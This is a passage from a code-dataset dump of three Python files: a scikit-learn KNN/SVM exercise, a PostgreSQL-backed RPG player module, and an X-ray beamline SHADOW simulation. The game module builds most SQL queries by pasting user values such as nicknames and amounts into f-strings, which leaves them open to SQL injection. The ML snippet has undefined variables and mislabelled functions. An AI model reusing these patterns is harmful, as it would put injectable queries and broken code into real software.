pd.DataFrame(ct.fit_transform(df))\nprint('-------------Data After pre_processing-------------')\nprint(df )\n\n#--------------------------------------------------------------------------------\n# Fathy functions (linear & knn)\n#--------------------------------------------------------------------------------\n\n\ndata = pd.read_csv(\"dataset.csv\")\nX = data.iloc[:, :-1].values\nprint(x)\ny = data.iloc[:, -1].values\nprint(y)\ntrain = 0.7\nx_train,x_test,y_train,y_test= train_test_split(X,y,train_size=train)\nmodel = KNeighborsClassifier(n_neighbors=3)\nmodel.fit(x_train,y_train)\nprediction = model.predict(x_test)\nprint (prediction)\n\n#--------------------------------------------------------------------------------\n# Fatma functions (SVM)\n#--------------------------------------------------------------------------------\ndef holdout() :\n data=pd.read_csv('dataset.csv')\n x = data.iloc[:, :-1]\n print(x.shape)\n y = data.iloc[:, -1]\n print(y.shape)\n x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.7)\n # لكن لو اختار ال kfold ينفذ دا\n from sklearn.model_selection import KFold\n k = 5\n kfold = KFold(n_splits=k, random_state=None, shuffle=True)\n for train_index, test_index in kfold.split(x):\n x_train, x_test = x.iloc[train_index, :], x.iloc[test_index, :]\n print(x_train)\n y_train, y_test = y[train_index], y[test_index]\n break\n # rba ,linear هيبقى قيه اتنين راديو باتن واحد\n # لو اختار rba\n # Create SVM classifier object\n classifier = svm.SVC(kernel='rbf')\n # Train SVM classifier on training data\n classifier.fit(x_train, y_train)\n y_pred = classifier.predict(x_test)\n matrix = confusion_matrix(y_test, y_pred)\n print(matrix)\n # accuracy score\n from sklearn.metrics import accuracy_score\n acc = accuracy_score(y_test, y_pred)\n print(\"accuracy\", acc) # دا هيظهر ف شكل label فيه كلمه accuracy و\n # text=accفيه قيمه ال\n # precisio\n from sklearn.metrics import precision_score\n pre = precision_score(y_test, y_pred, average='micro') # دا هيظهر ف شكل label فيه كلمه precision و\n print(\"precision\", pre) # text=preفيه قيمه ال\n # recall\n from sklearn.metrics import recall_score\n rec = recall_score(y_test, y_pred, average='micro')\n print(\"recall\", rec) # زى اللى فوق\n # f1-measure\n from sklearn.metrics import f1_score\n f1 = f1_score(y_test, y_pred, average='micro')\n print(\"measure\", f1)\n#\ndef k_fold() :\n # linearلكن لو اختار\n data = pd.read_csv('dataset.csv')\n x = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n from sklearn.model_selection import train_test_split\n x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.7)\n # Create SVM classifier object\n classifier = svm.SVC(kernel='linear')\n # Train SVM classifier on training data\n classifier.fit(x_train, y_train)\n y_pred = classifier.predict(x_test)\n from sklearn.metrics import confusion_matrix\n matrix = confusion_matrix(y_test, y_pred)\n print(matrix)\n # accuracy score\n from sklearn.metrics import accuracy_score\n acc = accuracy_score(y_test, y_pred)\n print(\"accuracy\", acc)\n # precision\n from sklearn.metrics import precision_score\n pre = precision_score(y_test, y_pred, average='micro')\n print(\"precision\", pre)\n # recall\n from sklearn.metrics import recall_score\n rec = recall_score(y_test, y_pred, average='micro')\n print(\"recall\", rec)\n # f1-measure\n from sklearn.metrics import f1_score\n f1 = f1_score(y_test, y_pred, average='micro')\n print(\"measure\", f1)\n\n\n# linearRegression()\n# knn()\n# holdout()\n# k_fold()\n","repo_name":"karimAdel2002/pre-processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1967083472","text":"import psycopg2 as ps\r\nfrom config import DB_URI\r\nimport random\r\nfrom datetime import date\r\nimport random\r\nimport asyncio\r\n\r\nclass Player():\r\n def __init__(self, id, uid, ban, nickname, race, health, maxhealth, level, xp, maxxp, gold, silver, copper, dater, donate, manna, maxmanna, action, keyb):\r\n self.id = id\r\n self.uid = uid\r\n self.ban = ban\r\n self.nickname = nickname\r\n self.race = race\r\n self.health = health\r\n self.maxhealth = maxhealth\r\n self.level = level\r\n self.xp = xp\r\n self.maxxp = maxxp\r\n self.gold = gold\r\n self.silver = silver\r\n self.copper = copper\r\n self.dater = dater\r\n self.donate = donate\r\n self.manna = manna\r\n self.maxmanna = maxmanna\r\n self.action = action\r\n self.keyb = keyb\r\n\r\n @staticmethod\r\n def create_profile(id, nick):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(\"SELECT uids FROM ids\")\r\n ids = cur.fetchone()\r\n x = random.randint(0, 10)\r\n if x == 3:\r\n racer = \"Демон\"\r\n if x == 6:\r\n racer = \"Эльф\"\r\n if x == 9:\r\n racer = \"Ангел\"\r\n else:\r\n racer = \"Человек\"\r\n daterr = date.today()\r\n if racer == \"Человек\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 250, 250, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Демон\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 1000, 1000, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Ангел\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 750, 750, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n if racer == \"Эльф\":\r\n cur.execute(\"INSERT INTO users VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", (id, ids[0], 0, nick, racer, 500, 500, 1, 0, 8, 0, 0, 0, daterr, \"Нет\", 0, 1000, \"main\", 1))\r\n cur.execute(\"UPDATE ids SET uids=uids+1\")\r\n db.commit()\r\n return racer\r\n\r\n @staticmethod\r\n def get_profile(id):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT gold, silver, copper, xp, maxxp, health, maxhealth, level FROM users WHERE id='{id}'\")\r\n g = cur.fetchone()\r\n s = round(g[1], 1)\r\n cur.execute(f\"UPDATE users SET silver='{s}' WHERE id='{id}'\")\r\n if g[3] >= g[4]:\r\n cur.execute(f\"UPDATE users SET xp=0 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET maxxp=maxxp*2 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET level=level+1 WHERE id='{id}'\")\r\n cur.execute(f\"UPDATE users SET maxhealth=maxhealth+10 WHERE id='{id}'\")\r\n cop = 200 * g[7]\r\n cur.execute(f\"UPDATE users SET copper=copper+'{cop}' WHERE id='{id}'\")\r\n if g[5] > g[6]:\r\n cur.execute(f\"UPDATE users SET health=maxhealth WHERE id='{id}'\")\r\n db.commit()\r\n cur.execute(f\"SELECT * FROM users WHERE id='{id}'\")\r\n i = cur.fetchone()\r\n if i == None:\r\n return False\r\n if i[2] == 1:\r\n return False\r\n if i != None:\r\n return Player(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18])\r\n\r\n def set_action(id, act):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET action='{act}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def keyb(id, ke):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET keyb='{ke}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def set_nick(id, nick):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"UPDATE users SET nickname='{nick}' WHERE uid='{id}'\")\r\n db.commit()\r\n\r\n def silver_gold(id, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT silver FROM users WHERE uid='{id}'\")\r\n i = cur.fetchone()\r\n if i[0] >= float(numb):\r\n x = float(numb)/100\r\n cur.execute(f\"UPDATE users SET gold=gold+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET silver=silver-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n if i[0] < float(numb):\r\n return False\r\n\r\n def bronze_silver(id, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n cur.execute(f\"SELECT copper FROM users WHERE uid='{id}'\")\r\n i = cur.fetchone()\r\n if i[0] >= float(numb):\r\n x = float(numb)/100\r\n cur.execute(f\"UPDATE users SET silver=silver+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n if i[0] < float(numb):\r\n return False\r\n\r\n def job(id, jid):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n if jid == 1:\r\n x = random.randint(0,1)\r\n m = random.randint(1,3)\r\n cur.execute(f\"UPDATE users SET xp=xp+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper+'{m}' WHERE uid='{id}'\")\r\n db.commit()\r\n return x, m\r\n if jid == 2:\r\n x = random.randint(0,2)\r\n m = random.randint(1,5)\r\n cur.execute(f\"UPDATE users SET xp=xp+'{x}' WHERE uid='{id}'\")\r\n cur.execute(f\"UPDATE users SET copper=copper+'{m}' WHERE uid='{id}'\")\r\n db.commit()\r\n return x, m\r\n\r\n def casino(id, idc, numb):\r\n db = ps.connect(DB_URI, sslmode=\"require\")\r\n cur = db.cursor()\r\n if idc == 1:\r\n x = random.randint(0,1)\r\n if x == 0:\r\n cur.execute(f\"UPDATE users SET copper=copper-'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n return 0\r\n if x == 1:\r\n cur.execute(f\"UPDATE users SET copper=copper+'{numb}' WHERE uid='{id}'\")\r\n db.commit()\r\n return 1","repo_name":"Tyzie/crossreverie","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6717997384","text":"import Shadow\nimport numpy\nfrom srxraylib.util.h5_simple_writer import H5SimpleWriter\nimport scipy.constants as codata\n\ndef ev_to_m(photon_energy):\n \"\"\" very short function just to get the wavelength in meters from the photon\n energy in eV using the formula: lambda = hc/E\"\"\"\n # scipy plack constant is in J/s, which is transformed to eV/s \n return (codata.h / codata.electron_volt * codata.c / photon_energy)\n\ndef photon_source(photon_energy):\n \"\"\" Function to convolve the electron beam size with the ID\n for now is only for U42 \"\"\"\n #electron properties\n e_size_h = 3.043e-05\n e_size_v = 3.645e-06\n e_div_h = 4.4e-06\n e_div_v = 1.37e-06\n #u42 length\n u42_l = 1.62\n #photon source\n photon_divx = numpy.sqrt((e_div_h)**2 + \\\n (0.69 * numpy.sqrt(ev_to_m(photon_energy) / u42_l))**2) \n photon_divy = numpy.sqrt((e_div_v)**2 + \\\n (0.69 * numpy.sqrt(ev_to_m(photon_energy) / u42_l))**2)\n photon_sx = numpy.sqrt((e_size_h)**2 + ((2.740 / (4 * numpy.pi)) \\\n * numpy.sqrt(ev_to_m(photon_energy) * u42_l))**2)\n photon_sy = numpy.sqrt((e_size_v)**2 + ((2.740 / (4 * numpy.pi)) \\\n * numpy.sqrt(ev_to_m(photon_energy) * u42_l))**2)\n\n return photon_divx, photon_divy, photon_sx, photon_sy \n\ndef dcmadeg(photon_energy):\n \"\"\" Short function to get the crystal angle in degress in function \n for now is only for Si(111) \"\"\"\n # Si (111) D spacing [m]\n dspa = 3.135416e-10\n\n return numpy.around((numpy.arcsin(ev_to_m(photon_energy)/(2 * dspa)) * 180 / numpy.pi), 10)\n\ndef foc_dist(working_distance, kbm='vfm'):\n \"\"\" This function gets the focal distance in meters for a given working\n distance (m) and a KB mirror: 'vfm' or 'hfm'. For the present ID21 SXM-II\n \"\"\"\n ver_p = 50.1 #distance of vfm to source\n hor_p = 50.19 #distance of hfm to source\n hfm_l = 0.06 #hfm length\n\n if kbm == 'vfm':\n q = hor_p - ver_p + hfm_l/2 + working_distance\n elif kbm == 'hfm':\n q = hfm_l/2 + working_distance\n else:\n raise RuntimeError(\"ERROR: Unidentified mirror, please enter 'vfm' or hfm'\")\n \n return numpy.around(q, decimals=2)\n\ndef diff_fwhm(photon_energy, working_distance, kbm='vfm'):\n \"\"\" This function provides a diffraction contribution term\n (in meters) to include it in the simulations results \"\"\"\n\n #both mirrors grazing angle\n m_angle = 0.006\n\n if kbm == 'vfm':\n mirror_active_length = 0.090\n b_i = mirror_active_length * numpy.sin(m_angle) #beam intercept by mirror (b_i) \n n_a = (b_i/2)/foc_dist(working_distance, kbm='vfm') #numerical aperture (n_a)\n \n elif kbm == 'hfm':\n mirror_active_length = 0.050\n b_i = mirror_active_length * numpy.sin(m_angle) \n n_a = (b_i/2)/foc_dist(working_distance, kbm='hfm')\n \n else:\n raise RuntimeError(\"ERROR: Unidentified mirror, please enter 'vfm' or hfm'\")\n\n #difracction FWHM contribution (diff) get the wavelength first in meters\n diff = 0.44 * (ev_to_m(photon_energy) / n_a)\n \n return diff \n\ndef run_shadow(photon_energy, working_distance, n_rays=1e6):\n \n \"\"\"This function run shadow for the full beamline\"\"\"\n \n # write (1) or not (0) SHADOW files start.xx end.xx star.xx\n iwrite = 0 \n #\n # initialize shadow3 source (oe0) and beam\n #\n beam = Shadow.Beam()\n oe0 = Shadow.Source()\n oe1 = Shadow.OE()\n oe2 = Shadow.OE()\n oe3 = Shadow.OE()\n oe4 = Shadow.OE()\n oe5 = Shadow.OE()\n oe6 = Shadow.OE()\n oe7 = Shadow.OE()\n oe8 = Shadow.OE()\n oe9 = Shadow.OE()\n oe10 = Shadow.OE()\n oe11 = Shadow.OE() \n #\n # Define variables. See meaning of variables in: \n # https://raw.githubusercontent.com/srio/shadow3/master/docs/source.nml \n # https://raw.githubusercontent.com/srio/shadow3/master/docs/oe.nml\n #\n # Source \n oe0.FDISTR = 3\n oe0.F_COLOR = 3\n oe0.F_PHOT = 0\n oe0.HDIV1 = 0.0\n oe0.HDIV2 = 0.0\n oe0.ISTAR1 = 0\n oe0.NPOINT = n_rays\n oe0.PH1 = photon_energy - 2.5 #small bandwidth\n oe0.PH2 = photon_energy + 2.5 #small bandwidth\n oe0.SIGDIX = photon_source(photon_energy)[0]\n oe0.SIGDIZ = photon_source(photon_energy)[1]\n oe0.SIGMAX = photon_source(photon_energy)[2]\n oe0.SIGMAZ = photon_source(photon_energy)[3]\n oe0.VDIV1 = 0.0\n oe0.VDIV2 = 0.0\n # Primary Slits\n oe1.DUMMY = 100.0\n oe1.FWRITE = 3\n oe1.F_REFRAC = 2\n oe1.F_SCREEN = 1\n oe1.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe1.N_SCREEN = 1\n oe1.RX_SLIT = numpy.array([0.00175, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe1.RZ_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe1.T_IMAGE = 0.0\n oe1.T_INCIDENCE = 0.0\n oe1.T_REFLECTION = 180.0\n oe1.T_SOURCE = 27.2\n #M0_1\n oe2.ALPHA = 90.0\n oe2.DUMMY = 100.0\n oe2.FHIT_C = 1\n if 2500 <= photon_energy <= 7000:\n oe2.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe2.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_1_Ni_shadow.dat'\n elif 7000 < photon_energy <= 10000:\n oe2.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Pt.dat'\n oe2.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_1_Pt_shadow.dat'\n else:\n raise RuntimeError(f\"ERROR: Photon energy {photon_energy} eV out of range\")\n oe2.FWRITE = 3\n oe2.F_G_S = 2\n oe2.F_REFLEC = 1\n oe2.F_RIPPLE = 1\n oe2.RLEN1 = 0.11\n oe2.RLEN2 = 0.11\n oe2.RWIDX1 = 0.04\n oe2.RWIDX2 = 0.04\n oe2.T_IMAGE = 0.0\n oe2.T_INCIDENCE = 89.5989295434\n oe2.T_REFLECTION = 89.5989295434\n oe2.T_SOURCE = 2.7\n #M0_2\n oe3.ALPHA = 180.0\n oe3.DUMMY = 100.0\n oe3.FHIT_C = 1\n if 2500 <= photon_energy <= 7000:\n oe3.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe3.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_2_Ni_shadow.dat'\n elif 7000 < photon_energy <= 10000:\n oe3.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Pt.dat'\n oe3.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/M0_2_Pt_shadow.dat'\n else:\n raise RuntimeError(f\"ERROR: Photon energy {photon_energy} eV out of range\") \n oe3.FWRITE = 3\n oe3.F_G_S = 2\n oe3.F_MOVE = 1\n oe3.F_REFLEC = 1\n oe3.F_RIPPLE = 1\n oe3.OFFY = -0.212\n oe3.RLEN1 = 0.484125\n oe3.RLEN2 = 0.484125\n oe3.RWIDX1 = 0.04\n oe3.RWIDX2 = 0.04\n oe3.T_IMAGE = 0.0\n oe3.T_INCIDENCE = 89.5989295434\n oe3.T_REFLECTION = 89.5989295434\n oe3.T_SOURCE = 0.825\n #Empty element\n oe4.ALPHA = 90.0\n oe4.DUMMY = 100.0\n oe4.FWRITE = 3\n oe4.F_REFRAC = 2\n oe4.T_IMAGE = 0.0\n oe4.T_INCIDENCE = 0.0\n oe4.T_REFLECTION = 180.0\n oe4.T_SOURCE = 0.0\n #Secondary Slits\n oe5.DUMMY = 100.0\n oe5.FWRITE = 3\n oe5.F_REFRAC = 2\n oe5.F_SCREEN = 1\n oe5.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe5.N_SCREEN = 1\n oe5.RX_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe5.RZ_SLIT = numpy.array([0.0015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe5.T_IMAGE = 0.0\n oe5.T_INCIDENCE = 0.0\n oe5.T_REFLECTION = 180.0\n oe5.T_SOURCE = 5.475\n #DCM-1\n oe6.DUMMY = 100.0\n oe6.FHIT_C = 1\n oe6.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Si2_15.111'\n oe6.FWRITE = 1\n oe6.F_CENTRAL = 1\n oe6.F_CRYSTAL = 1\n oe6.PHOT_CENT = photon_energy\n oe6.RLEN1 = 0.008\n oe6.RLEN2 = 0.072\n oe6.RWIDX1 = 0.005\n oe6.RWIDX2 = 0.005\n oe6.R_LAMBDA = 5000.0\n oe6.T_IMAGE = 0.0\n oe6.T_INCIDENCE = 90 - dcmadeg(photon_energy)\n oe6.T_REFLECTION = 90 - dcmadeg(photon_energy)\n oe6.T_SOURCE = 1.9\n #DCM-2\n oe7.ALPHA = 180.0\n oe7.DUMMY = 100.0\n oe7.FHIT_C = 1\n oe7.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Si2_15.111'\n oe7.FWRITE = 1\n oe7.F_CENTRAL = 1\n oe7.F_CRYSTAL = 1\n oe7.PHOT_CENT = photon_energy\n oe7.RLEN1 = 0.008\n oe7.RLEN2 = 0.072\n oe7.RWIDX1 = 0.005\n oe7.RWIDX2 = 0.005\n oe7.R_LAMBDA = 5000.0\n oe7.T_IMAGE = 0.0\n oe7.T_INCIDENCE = 90 - dcmadeg(photon_energy)\n oe7.T_REFLECTION = 90 - dcmadeg(photon_energy)\n oe7.T_SOURCE = 0.012\n #KB Slits \n oe8.DUMMY = 100.0\n oe8.FWRITE = 3\n oe8.F_REFRAC = 2\n oe8.F_SCREEN = 1\n oe8.I_SLIT = numpy.array([1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n oe8.N_SCREEN = 1\n oe8.RX_SLIT = numpy.array([0.0003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe8.RZ_SLIT = numpy.array([0.00054, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n oe8.T_IMAGE = 0.0\n oe8.T_INCIDENCE = 0.0\n oe8.T_REFLECTION = 180.0\n oe8.T_SOURCE = 11.488\n #VFM\n oe9.DUMMY = 100.0\n oe9.FCYL = 1\n oe9.FHIT_C = 1\n oe9.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe9.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/VFM_sim_0.6urad.dat'\n oe9.FMIRR = 2\n oe9.FWRITE = 1\n oe9.F_DEFAULT = 0\n oe9.F_G_S = 2\n oe9.F_REFLEC = 1\n oe9.F_RIPPLE = 1\n oe9.RLEN1 = 0.045\n oe9.RLEN2 = 0.045\n oe9.RWIDX1 = 0.015\n oe9.RWIDX2 = 0.015\n oe9.SIMAG = foc_dist(working_distance, kbm='vfm')\n oe9.SSOUR = 51.5\n oe9.THETA = 89.6562253229\n oe9.T_IMAGE = 0.0575\n oe9.T_INCIDENCE = 89.6562253229\n oe9.T_REFLECTION = 89.6562253229\n oe9.T_SOURCE = 0.5\n #HFM\n oe10.ALPHA = 90.0\n oe10.DUMMY = 100.0\n oe10.FCYL = 1\n oe10.FHIT_C = 1\n oe10.FILE_REFL = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/Ni.dat'\n oe10.FILE_RIP = b'/home/esrf/reyesher/OASYS/OasysID21/ID21_SXM-II/HFM_sim_0.6urad.dat'\n oe10.FMIRR = 2\n oe10.FWRITE = 1\n oe10.F_DEFAULT = 0\n oe10.F_G_S = 2\n oe10.F_REFLEC = 1\n oe10.F_RIPPLE = 1\n oe10.RLEN1 = 0.025\n oe10.RLEN2 = 0.025\n oe10.RWIDX1 = 0.015\n oe10.RWIDX2 = 0.015\n oe10.SIMAG = foc_dist(working_distance, kbm='hfm')\n oe10.SSOUR = 51.59\n oe10.THETA = 89.6562253229\n oe10.T_IMAGE = foc_dist(working_distance, kbm='hfm')\n oe10.T_INCIDENCE = 89.6562253229\n oe10.T_REFLECTION = 89.6562253229\n oe10.T_SOURCE = 0.0325\n #Sample\n oe11.ALPHA = 90.0\n oe11.DUMMY = 100.0\n oe11.FWRITE = 3\n oe11.F_REFRAC = 2\n oe11.T_IMAGE = 0.0\n oe11.T_INCIDENCE = 0.0\n oe11.T_REFLECTION = 180.0\n oe11.T_SOURCE = 0.0 \n \n #Run SHADOW to create the source\n \n if iwrite:\n oe0.write(\"start.00\")\n \n beam.genSource(oe0)\n \n if iwrite:\n oe0.write(\"end.00\")\n beam.write(\"begin.dat\") \n \n #\n #run optical element 1\n #\n print(\" Running optical element: %d\"%(1))\n if iwrite:\n oe1.write(\"start.01\")\n \n beam.traceOE(oe1,1)\n \n if iwrite:\n oe1.write(\"end.01\")\n beam.write(\"star.01\") \n \n #\n #run optical element 2\n #\n print(\" Running optical element: %d\"%(2))\n if iwrite:\n oe2.write(\"start.02\")\n \n beam.traceOE(oe2,2)\n \n if iwrite:\n oe2.write(\"end.02\")\n beam.write(\"star.02\") \n \n #\n #run optical element 3\n #\n print(\" Running optical element: %d\"%(3))\n if iwrite:\n oe3.write(\"start.03\")\n \n beam.traceOE(oe3,3)\n \n if iwrite:\n oe3.write(\"end.03\")\n beam.write(\"star.03\") \n \n #\n #run optical element 4\n #\n print(\" Running optical element: %d\"%(4))\n if iwrite:\n oe4.write(\"start.04\")\n \n beam.traceOE(oe4,4)\n \n if iwrite:\n oe4.write(\"end.04\")\n beam.write(\"star.04\") \n \n #\n #run optical element 5\n #\n print(\" Running optical element: %d\"%(5))\n if iwrite:\n oe5.write(\"start.05\")\n \n beam.traceOE(oe5,5)\n \n if iwrite:\n oe5.write(\"end.05\")\n beam.write(\"star.05\") \n \n #\n #run optical element 6\n #\n print(\" Running optical element: %d\"%(6))\n if iwrite:\n oe6.write(\"start.06\")\n \n beam.traceOE(oe6,6)\n \n if iwrite:\n oe6.write(\"end.06\")\n beam.write(\"star.06\") \n \n #\n #run optical element 7\n #\n print(\" Running optical element: %d\"%(7))\n if iwrite:\n oe7.write(\"start.07\")\n \n beam.traceOE(oe7,7)\n \n if iwrite:\n oe7.write(\"end.07\")\n beam.write(\"star.07\") \n \n #\n #run optical element 8\n #\n print(\" Running optical element: %d\"%(8))\n if iwrite:\n oe8.write(\"start.08\")\n \n beam.traceOE(oe8,8)\n \n if iwrite:\n oe8.write(\"end.08\")\n beam.write(\"star.08\") \n \n #\n #run optical element 9\n #\n print(\" Running optical element: %d\"%(9))\n if iwrite:\n oe9.write(\"start.09\")\n \n beam.traceOE(oe9,9)\n \n if iwrite:\n oe9.write(\"end.09\")\n beam.write(\"star.09\") \n \n #\n #run optical element 10\n #\n print(\" Running optical element: %d\"%(10))\n if iwrite:\n oe10.write(\"start.10\")\n \n beam.traceOE(oe10,10)\n \n if iwrite:\n oe10.write(\"end.10\")\n beam.write(\"star.10\") \n \n #\n #run optical element 11\n #\n print(\" Running optical element: %d\"%(11))\n if iwrite:\n oe11.write(\"start.11\")\n \n beam.traceOE(oe11,11)\n \n if iwrite:\n oe11.write(\"end.11\")\n beam.write(\"star.11\")\n\n return beam, oe0\n\ndef write_output(working_distance, photon_energies, n_rays):\n \"\"\" This function writes an h5 output file, from a given photon\n energies array, and a working distance, please notice diffraction\n contribution is taken into account to get the final FWHMs\"\"\"\n #output tempo arrays\n out = numpy.zeros((8, photon_energies.size))\n \n for i, photon_energy in enumerate(photon_energies):\n \n beam, oe0 = run_shadow(photon_energy, working_distance, n_rays=n_rays)\n\n histo2 = beam.histo2(1, 3, nolost=1, nbins = 201)\n\n out[0,i] = photon_energy\n out[1,i] = histo2['fwhm_h'] * 1e6 # horizontal fwhm microns\n out[2,i] = histo2['fwhm_v'] * 1e6 # vertical fwhm microns\n out[3,i] = beam.intensity(nolost=1)/oe0.NTOTALPOINT #Beamline transmitivity\n out[4,i] = numpy.sqrt((histo2['fwhm_h']*1e6)**2 + (diff_fwhm(photon_energy, working_distance, kbm='hfm')*1e6)**2) #considering diff factor\n out[5,i] = numpy.sqrt((histo2['fwhm_v']*1e6)**2 + (diff_fwhm(photon_energy, working_distance, kbm='vfm')*1e6)**2) #considering diff factor\n out[6,i] = beam.intensity(nolost=1) #Beamline intensity\n out[7,i] = oe0.NTOTALPOINT #Total initial rays\n \n h5w = H5SimpleWriter.initialize_file(f'shadow_sxm2_work_dist_{working_distance*1e3}_mm.h5',\n creator=\"h5_basic_writer.py\")\n h5w.create_entry(f'work_dist_{working_distance*1e3}_mm', nx_default=\"Beam Size\")\n\n h5w.add_dataset(out[0,:], out[1,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Beam Size Horizontal\",\n title_x='Photon Energy (eV)', title_y='FWHM_H (um)')\n h5w.add_dataset(out[0,:], out[2,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Beam Size Vertical\",\n title_x='Photon Energy (eV)', title_y='FWHM_V (um)')\n h5w.add_dataset(out[0,:], out[3,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Transmitivity\",\n title_x='Photon Energy (eV)', title_y='Beamline transmitivity')\n h5w.add_dataset(out[0, :], out[4, :], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name = \"Beam Size Horizontal (DL)\",\n title_x = 'Photon Energy (eV)', title_y = 'FWHM_H (um)')\n h5w.add_dataset(out[0, :], out[5, :], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name = \"Beam Size Vertical (DL)\",\n title_x = 'Photon Energy (eV)', title_y = 'FWHM_V (um)')\n h5w.add_dataset(out[0,:], out[6,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Intensity\",\n title_x='Photon Energy (eV)', title_y='Intensity')\n h5w.add_dataset(out[0,:], out[7,:], entry_name=f'work_dist_{working_distance*1e3}_mm',\n dataset_name=\"Total initial rays\",\n title_x='Photon Energy (eV)', title_y='Total initial rays') \n\n\n print(f'shadow_sxm2_work_dist_{working_distance*1e3}_mm.h5 has been save on disk') \n\nif __name__ == \"__main__\":\n #test\n #photon_energies = numpy.array([5000, 9000])\n #working_distances = [0.03]\n\n #simulations\n\n #working_distances = [0.03, 0.04, 0.05, 0.06] # 4 working distances \n #photon_energies = numpy.arange(2500, 10000, 800) # 10 steps \n#\n #for working_distance in working_distances:\n # write_output(working_distance, photon_energies, n_rays=10e6)\n pass\n","repo_name":"jureyherrera/scripts_and_workspaces","sub_path":"id21/shadow_sxm2.py","file_name":"shadow_sxm2.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 